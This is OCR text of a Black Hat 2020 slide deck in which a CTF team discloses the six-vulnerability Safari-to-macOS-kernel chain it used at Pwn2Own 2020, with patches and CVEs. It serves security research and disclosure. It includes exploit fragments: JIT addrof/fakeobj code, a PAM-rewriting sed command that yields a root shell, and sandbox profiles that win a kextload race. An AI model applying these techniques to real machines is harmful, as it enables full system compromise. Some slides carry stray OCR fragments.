

AUGUST 5-6, 2020 Briefings

### Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities

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r00timentary

Our CTF team

#### We won Pwn2Own 2020!



#### Preparation for Pwn2Own 2020

- Period: a month
- Method
  - 1. Fuzzing: Found several bugs, but they are all unexploitable
  - 2. CodeQL: Looks great, but we lack the time to learn
  - 3. Manual analysis: Most of our findings come from ③
- Strategy: Frequent yet quick meetings (twice a week) to share information among members to fully utilize the short preparation time

#### Target selection: Why Safari?

- 1. Browser category: Challenging yet interesting target
- 2. \*nix-like: More familiar platform for us than Windows
- 3. Previous experience: e.g., CVE-2019-8832 Sandbox escape in Safari discovered by one of our team members





### Background: in operator

#### 0 in arr;

- Returns true if the specific property is in the specified object or its prototype chain (from MDN)
- in operator is usually side-effect free
  - It only returns its checking result without modifying anything

#### JIT optimization for side-effect free code



- If in operator is modeled as side-effect free (i.e., cannot change arr2's type), the following check is considered as redundant and will be eliminated for optimization
- However, if a side-effect happens due to incorrect modeling, it can change arr2's type and lead to type confusion

# WebKit missed to handle side effects from DOM events of in operator

- WebKit uses PDFPlugin to support an embedded PDF file
- For efficiency, the plugin is *lazily* initialized when using its internal data including in operator
- This lazy initialization triggers a DOM event named *DOMSubtreeModified*
- We can register handlers for DOM events to invoke arbitrary JavaScript code

This bug is very interesting because it is JavaScript engine's bug but comes from outside of the engine



### How to trigger the bug

Automatic intrusion recovery with system wide his	tory
Automatic intrusion recovery with system-while ins	tory
by	
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```
<embed src="kim_thesis.pdf"/>
```

```
1. Add any PDF file using HTML
```

arr.\_\_proto\_\_ = \$\$('embed'); document.addEventListener( 'DOMSubtreeModified', event => { print("Hello World"); } );

2. Install an event handler that triggers side effects

0 in arr;

3. in operator will be considered as side-effect free during JIT compilation even though it has side effects (e.g., printing "Hello World")

# Let's abuse this bug to make addrof / fakeobj primitives for exploitation

• addrof: Get an address of an object

arr2[0] = objToLeak;

```
Ref: Samuel Groß, "New Trends in Browser Exploitation: Attacking Client-Side JIT Compilers", BLACKHAT USA 2018
```

# Let's abuse this bug to make addrof / fakeobj primitives for exploitation

#### • fakeobj: Make arbitrary address into an object

```
function opt(arr1, arr2, addr) {
 arr2[1] = 6.6; // Type check: ArrayWithDouble (i.e., all elements are double)
 // NOTE: arr2's type check is eliminated because it is considered as redundant
 // Set arr2[0] as the double value 'addr', which will be considered as an object
 arr2[0] = addr;
document.addEventListener(
 'DOMSubtreeModified',
 event => \{
   // arr2 is converted into ArrayWithContiguous
   // (i.e., elements are objects)
   arr2[0] = \{\};
```

# We reuse existing techniques to achieve arbitrary code execution

- 1. Bypass randomized structure ID to make a valid object
  - Use Wang's technique to leak the structure ID
  - Ref: Yong Wang, "Thinking Outside the JIT Compiler: Understanding and Bypassing StructureID Randomization with Generic and Old-School Methods", BLACKHAT EU 2019
- 2. Achieve arbitrary read/write
  - Abuse butterfly structure in JSC
  - Ref: <u>https://github.com/niklasb/sploits</u>
- 3. Write a JIT region (RWX) to execute shellcode

#### Patch (CVE-2020-9850)

- Commit ID be8a463
- WebKit starts to consider that in operator has side-effects if an object's prototype is modified

+	r	WW -3/13,0 +3/23,11 WW class Fixuprilase , public riase {
3715	3725	<pre>node-&gt;setInternalMethodType(PropertySlot::InternalMethodType::HasProperty);</pre>
3716	3726	
3717	3727	<pre>blessArrayOperation(m_graph.varArgChild(node, 0), m_graph.varArgChild(node, 1), m_graph.varArgChild(node, 2));</pre>
	3728	+ auto arrayMode = node->arrayMode();
	3729	+ // FIXME: OutOfBounds shouldn't preclude going same chain because OOB is just false and cannot have effects.
	3730	+ // See: https://bugs.webkit.org/show_bug.cgi?id=209456
	3731	+ if (arrayMode.isJSArrayWithOriginalStructure() && arrayMode.speculation() == Array::InBounds)
	3732	+ setSaneChainIfPossible(node);
3718	3733	
3719	3734	<pre>fixEdge<celluse>(m_graph.varArgChild(node, 0));</celluse></pre>





• Chrome: Open a directory in a browser

S Index of / + X С i File /  $\leftarrow \rightarrow$ 

#### Index of /

Name	Size	Date Modified
.fseventsd/		4/16/20, 9:45:30 PM
.vol/		2/29/20, 1:09:52 AM
Applications/		5/28/20, 12:40:58 PM
bin/		3/17/20, 10:59:50 AM

#### • Safari: Pop up Finder?!



### Safari uses selectFile() to launch Finder

```
@implementation BrowserNavigationDelegate
- decidePolicyForNavigationResponse(WKNavigationResponse *response) {
    ...
    NSURL URL = response._request.URL.strip("file://");
    [[NSWorkspace sharedWorkspace] selectFile:URL inFileViewerRootedAtPath:nil];
}
@end
```

- In the past, Safari just opens a file (CVE-2011-3230)
- Now it opens a directory containing the file
- Where else selectFile() is being used?

# Safari's different use of selectFile() allows us to launch an arbitrary app

# @implementation NSWorkspace - safari\_revealFile: (NSURL) URL { ... if ( [self isFilePackageAtPath:URL] ) // <- checks whether a URL points to an app [self selectFile:URL else [self selectFile:nil } @end ... </pre>

- After a quick experiment, we discovered that
  - isFilePackageAtPath() checks that a path is *a directory whose name ends with ".app"* (i.e., symbolic link can bypass this check)
  - 2. If selectFile()'s second argument (inFileViewerRootedAtPath) points an app, selectFile() will launch the app even *if it is symbolic link*
  - 3. The renderer (i.e., WebProcess) can make a broker to call this function using Safari IPC FailProvisionalNavigation

#### Two problems still exist to launch the arbitrary app

#### 1. WebProcess cannot create a symbolic link because of its sandbox

- To resolve this, we use the bug (3) arbitrary code execution in CVMServer
- 2. macOS has first-time app protection
  - Waits a user's confirmation
  - We use the bug (4) to bypass this



#### You are opening the application "103482" for the first time. Are you sure you want to open this application?

The application is in a folder named "CVMS." To see the application in the Finder without opening it, click Show Application.

Cancel

Show Application

Open

#### Patch (CVE-2020-9801)

```
@implementation NSWorkspace
- safari_revealFile:(NSURL)URL {
    ...
    if ( [self isFilePackageAtPath:URL] ) // <- checks whether a URL points to an app
       [self selectFile:URL inFileViewerRootedAtPath:nil] // <- same as before
    else
       [self selectFile:nil inFileViewerRootedAtPath:URL] // <- ?
}
@end
```

• They removed the application-launching path



### What is CVMServer (com.apple.cvmsServ)?

• An accessible XPC service from WebProcess

```
; com.apple.WebProcess.sb
(define (system-graphics)
    (allow mach-lookup
        (global-name "com.apple.cvmsServ"))
    ...
)
(system-graphics)
```

- It is used to support OpenGL rendering
- Root privilege and sandboxed, but it has more capabilities than WebProcess
  - e.g., create symlink (for the bug (2)) and send signals (for the bug (4))

#### Heap overflow exists in CVMserver

- If the "message" field of the XPC request is 4, CVMServer calls a function named cvmsServerServiceAttach()
  - All of its arguments are controllable since they are from the XPC request

```
case 4:
    reply_ = reply;
LODWORD(base_size) = 0;
    data_ptr = xpc_dictionary_get_data(input, "args", &data_size);
    res = 533;
    if ( data_size == 16 )
    {
        session = ala->session;
        framework_name = xpc_dictionary_get_string(input, "framework_name");
        bitcode_name = xpc_dictionary_get_string(input, "bitcode_name");
        bitcode_name = xpc_dictionary_get_string(input, "bitcode_name");
        plugin_name = xpc_dictionary_get_string(input, "plugin_name");
        res = cvmsServerServiceAttach(session, framework_name, bitcode_name, plugin_name
```

#### Heap overflow exists in CVMserver (cont.)

- Opens "{framework\_name}.x86\_64.{uid}.maps"
  - Since 'framework\_name' is controllable, we can make it to open a file in arbitrary directory (e.g., a file in Safari's sandbox directory)

```
arch type = cvmsArchTypeString(*(v38 + 652));
           ___snprintf_chk(
            maps,
             0x400uLL,
             0,
             0X400ull,
             "/System/Library/Caches/com.apple.CVMS/%s.%s.%u.maps",
             framework path ,
            arch type,
            *(*(\sqrt{38} + 56) + 5611)):
          if ( *(*(v38 + 32) + 119LL) )
            unlink(maps);
            v97 = strlen(maps);
            *(maps + v97) = 0;
            *(&v171 + v97) = 'atad';
            unlink(maps);
BEL 245:
             *v152 = *(v166 + 15);
             v6 = 0;
             goto LABEL 90;
               = fopen(maps, "r");
              ( 10151 )
            goto LABEL 245;
```

#### Heap overflow exists in CVMserver (cont.)

• CVMServer reads the .maps file by calculating its size based on its data

```
if ( buf->word44 )
{
    if ( buf->dword3C == *(_DWORD *)(v38 + 648) )
    {
        uid = *(Pool **)(v38 + 56);
        body_offset = buf->unsigned4A;
        cnt = buf->unsigned40;
        v138 = 56 * cnt;
        buf = (header *)realloc(buf, 56 * cnt + body_offset);
        body_offset_ = buf->unsigned4A;
        fread(&buf->char50, v138 + body_offset_ - 80, 1uLL, v132);
```

```
// Pseudocode for the above binary code
// cnt and offset are read from the .maps file (i.e. controllable)
size = 56 * cnt + offset;
buf = realloc(size);
fread(buf + 80, size - 80, 1, fp);
// size could be smaller than 80, e.g., cnt = offset = 0 → size = 0
// If size = 0, size - 80 becomes a very large value
// NOTE: fread stops at EOF → size to overwrite is also controllable
```

# Exploitation: CVMServer has another message handler that returns the mach port

- If the "message" field of the XPC request is 7, CVMServer returns a mach port to the client
  - A mach port is an IPC mechanism in macOS
  - A task port should not be exposed to other processes because it allows read/write memory + control registers (i.e., arbitrary code execution)

```
case 7:
  if ( !a1a->attached )
    goto send_reply;
  vm_size = 0LL;
  LODWORD(vm_port) = 0;
  heap_index_ = xpc_dictionary_get_uint64(input, "heap_index");
  res = cvmsServerServiceGetMemory(a1a->session, heap_index_, &vm_port, &vm_size);
  if ( res )
    goto send_reply:
    xpc_dictionary_set_mach_send(reply, "vm_port", (unsigned int)vm port);
    field_size = (__int64)vm_size;
    field_name = "vm_size";
    goto set_field_and_reply;
```

# The returning port in the handler is retrieved from an array located in heap

### An exploitation abuses the mach port

Our buffer (AAAAAAAA)	 Task port	

- 1. Overwrite a port into the task port and send a message 7
- 2. Client (WebProcess) will receive the task port of CVMServer
- 3. We can execute arbitrary code in CVMServer by allocating memory and modifying a sthread's registers

#### Patch (CVE-2020-9856)

• They now check if realpath() of .maps file equals to the given path

- We cannot use ../../ anymore
- Check for size >= 80 is added

size = 56 \* cnt + offset; buf = realloc(size); + if(size >= 80) fread(buf + 80, size - 80, 1, fp);



#### Reminder: First-time app protection



- It waits a user's confirmation to click 'Open'
- Q: How is it implemented?

#### Let's see a process list

● ● ● Downloads — -zsh ト open — 107×17											
[jin-yonghwi@jin-yo	onghwis	s-Mac	Down	loads % ps	aux	grep	my.ap	р			] 日
jin-yonghwi	920	0.0	0.0	4268192	584	s001	R+	7:00PM	0:00.00	grep my.app	
[jin-yonghwi@jin-yo	onghwis	s-Mac	Down	loads % op	en my.	арр					]
[jin-yonghwi@jin-yo	onghwis	s-Mac	Down	loads % op	en my.	app &					]
[1] 924											
[jin-yonghwi@jin-yo	onghwis	s-Mac	Down	loads % ps	aux	grep	my.ap	р			]
jin-yonghwi	929	0.0	0.0	4268300	700	s001	R+	7:00PM	0:00.00	grep my.app	
jin-yonghwi	927	0.0	0.0	4259056	12	??	т	7:00PM	0:00.00	/private/var/folders/qk/trml2	2
69j1196kcv1j165n7j	j40000g	gn/T//	AppTr	anslocatio	n/7741	LF1AC-	7AA9-4	765-9BF4-	-5B08B1E1	DEE7/d/my.app/Contents/MacOS/0	5
alculator -psn_0_315469											
jin-yonghwi	924	0.0	0.1	4385568	7388	s001	SN	7:00PM	0:00.04	open my.app	
jin-yonghwi@jin-yo	nghwis	-Mac	Down	loads %							┛
	-			_							

- It turns out that the first-time app protection starts the application in the suspended state
- What if it receives SIGCONT signal?

**É Terminal** Shell Edit View Window Help



#### Patch: Won't fix

- Guess about the reasons
  - Demanding prerequisites to exploit: It requires arbitrary code execution to send signals and .app launching vulnerability
  - Non-trivial kernel modification: Kernel needs to support secure UI to safely support this mechanism against a privileged attacker
- Thus, if you have similar types of vulnerabilities, you can bypass the first-time app protection with this method

#### Summary: RCE + Sandbox escape

- 1. Achieve arbitrary code execution in WebProcess using the bug (1)
- 2. Achieve arbitrary code execution in CVMServer using the bug (3)
- 3. Create a symbolic link for an arbitrary app using CVMServer
- 4. Call IPC to launch the app (the bug (2)) using WebProcess
- 5. Send SIGCONT (the bug (4)) to bypass the first-time app protection



#### What is cfprefsd?

- An XPC service located at CoreFoundation
- It reads / writes preference files (i.e. plist) by user requests
- There were several security issues
  - e.g., CodeColorist, "One-liner Safari Sandbox Escape Exploit"

#### CFPreferencesSetAppValue

• If a client calls

CFPreferencesSetAppValue("Key", "Value", "/path/to/.plist")

- 1. Check if the client process can write .plist
- 2. Create the directory /path/to/ recursively
- 3. Write a new content to .plist (with Key=Value)

#### Directory creation in cfprefsd is racy



- 2. Change the access permissions using chmod()
- 3. Change the owner to the client using chown()

### /usr/bin/login

- Authenticates a user based on policy in /etc/pam.d/login
- /etc/pam.d/login
  - Specifies PAM modules for authenticating
  - e.g., pam\_permit.so: always permit access without authentication

# Arbitrary file write leads to root privilege escalation using login

• Change all PAM modules into pam\_permit.so

OpenSS	H SSH client	_	$\times$	OpenSSH SSH client	- 🗆	$\times$
<pre>\$ cat /etd # login: a auth auth auth account account password session session \$ _</pre>	c/pam.d/login auth account pa optional optional required required required required required optional	assword session pam_krb5.so use_kcminit pam_ntlm.so try_first_pass pam_mount.so try_first_pass pam_opendirectory.so try_first_pass pam_opendirectory.so pam_opendirectory.so pam_launchd.so pam_uwtmp.so pam_mount.so	^	<pre>\$ sudo sed -i.bak 's/pam.*/pam_permit.so/g' /etc/pam.d/login \$ cat /etc/pam.d/login # login: auth account password session auth optional pam_permit.so auth optional pam_permit.so auth optional pam_permit.so auth required pam_permit.so account required pam_permit.so password required pam_permit.so session required pam_permit.so session required pam_permit.so session required pam_permit.so session optional pam_permit.so \$</pre>		
			$\sim$			$\sim$

• Then, `login root` will give us a root-privileged shell!

#### Patch (CVE-2020-9839)

• Now it uses openat + O\_NOFOLLOW and fchown instead

```
int CFPrefsCreatePreferencesDirectory(path) {
    int dirfd = open("/", 0 DIRECTORY);
    for(slice in path.split("/")) {
        int fd = openat(dirfd, slice, 0 DIRECTORY);
        if (fd == -1 && errno == ENOENT && !mkdirat(dirfd, slice, perm)) {
            fd = openat(dirfd, slice, O_DIRECTORY|O_NOFOLLOW);
            if ( fd == -1 ) return -1;
            fchown(fd, uid, gid);
    } // close all fds
    return 0;
```



### System Integrity Protection (SIP)

- In macOS, root != kernel
- Even a root-privileged user cannot write to folders with the attribute "com.apple.rootless"
- Only specially entitled binaries can write to these folders
  - e.g., Kernel extension loader (kextload), macOS installer (brtool\_legacy), ...
  - Needs to be signed by Apple to have the special entitlements
- Added from OS X 10.11, also called "rootless"

#### Kernel extensions (kext) in macOS

- macOS uses many kernel modules (.kext folders)
  - e.g., BSD.kext, Sandbox.kext, Quarantine.kext, ...
  - Contains binaries and configuration files (e.g., plist)
- All folders are protected by SIP
  - i.e., a root user cannot directly write to the kernel modules
- Can only load \*signed\* kexts using `kextload`

#### Background: kextload

- Has a special entitlement to write a directory that is protected by SIP
  - e.g., .kext directories
- Load a kernel extension after code sign verification
- Signature check happens in user space
  - check\_signature(kext\_path) → OSKextLoad(kext\_path)
  - Thus, a race condition could happen

### kextload uses staging to prevent the race condition

- Staging: Use read-only copy for verifying and loading kext
- To prevent a race condition, kextload
  - Copy .kext to /Library/StagedExtensions, which is protected by SIP
  - Verify and load this copy instead of using an original one
  - An attacker cannot modify .kext between verifying and loading because of SIP (i.e., fail to exploit the race condition)

### Two problems exist in kextload's staging

\$ kextload /tmp/A.kext
1. Copy /tmp/A.kext to /Library/StagedExtensic
2. Validate its code signature
3. If fails, delete it from /Library/StagedExtensions
4. If succeeded, move it to /Library/StagedExtensions/tmp/A.kext

5. Load the kext

#### Revive a race condition in kextload (1)

\$ kextload /tmp/A.kext # /tmp/A.kext/symlink → /tmp

1. Copy /tmp/A.kext to /Library/StagedExtensions/tmp/[UUID].kext # /tmp/StagedExtensions/tmp/[UUID].kext/symlink → /tmp

2. Validate its code signature

Kill kextload

3. If fails, delete it from /Library/StagedExtensions

4. If succeeded, copy it to /Library/StagedExtensions/tmp/A.kext

5. Load the kext

#### Revive a race condition in kextload (2)

\$ kextload /tmp/[UUID].kext/symlink/B.kext

. . .

Copy /tmp/[UUID].kext/symlink/B.kext to
 /Library/StagedExtensions/tmp/[UUID].kext/symlink/[UUID'].kext

 # → /tmp/[UUID'].kext

This kext is no longer protected by SIP!

# 100% reliable exploit for a race condition using custom sandbox

• Sandbox can be used to intercept a process's activity

```
#1. Prevent deleting staged filesby terminating kextload
```

```
(deny syscall-unix
    (syscall-number SYS_unlink)
    (with send-signal SIGTERM)
)
```

#2. Stop after file read to replace files after code sign check

```
(allow file-read
    (literal "/A.kext")
    (with send-signal SIGSTOP)
```

• Inspired by CodeColorist, "ModJack: Hijacking the macOS Kernel", HITB 2019

### We can load any kernel module in kernel privilege (e.g., Unrootless.kext from Linus Henze)



#### Patch

- It uses another protected folder before copying into /Library/StagedExtensions
- 1. Copy to /var/db/StagedExtensions/tmp.XXXXX/[UUID].kext
- 2. Verify it
- 3. Copy to /Library/StagedExtensions/tmp/A.kext



#### Conclusion

- Discuss 6 vulnerabilities and their exploitations used in Pwn2Own 2020 to compromise Safari with escalation of kernel privilege
- Show difficulties in protecting a large and complicated system
- We open-source our exploit chain to foster further research!

https://github.com/sslab-gatech/pwn2own2020

### Thank you!